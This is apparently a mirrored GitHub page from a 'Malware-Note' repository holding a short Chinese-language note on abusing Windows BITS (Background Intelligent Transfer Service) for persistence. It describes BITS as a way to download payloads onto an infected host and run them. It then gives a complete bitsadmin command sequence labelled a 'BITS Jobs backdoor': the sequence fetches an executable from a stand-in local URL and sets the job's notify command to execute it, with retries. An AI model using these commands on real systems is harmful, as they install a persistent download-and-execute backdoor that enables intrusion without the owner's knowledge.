qwqdanchun
/
Malware-Note
mirror of https://github.com/qwqdanchun/Malware-Note.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity
Malware-Note/persistence/bits-jobs/bits.md

648 B
Raw Permalink Blame History

BITS

BITS

后台智能传输服务它可以促进文件到Web服务器HTTP和共享文件夹SMB的传输能力。

可以滥用此功能以便在受感染的主机上下载有效负载可执行文件PowerShell脚本Scriptlet等并在给定时间执行这些文件

新建BITS Jobs后门 

bitsadmin /create qwqdanchun
bitsadmin /addfile qwqdanchun "http://127.0.0.1/qwqdanchun.exe"  "C:\Temp\qwqdanchun.exe"
bitsadmin /SetNotifyCmdLine qwqdanchun C:\Temp\qwqdanchun.exe NUL
bitsadmin /SetMinRetryDelay "qwqdanchun" 60
bitsadmin /resume qwqdanchun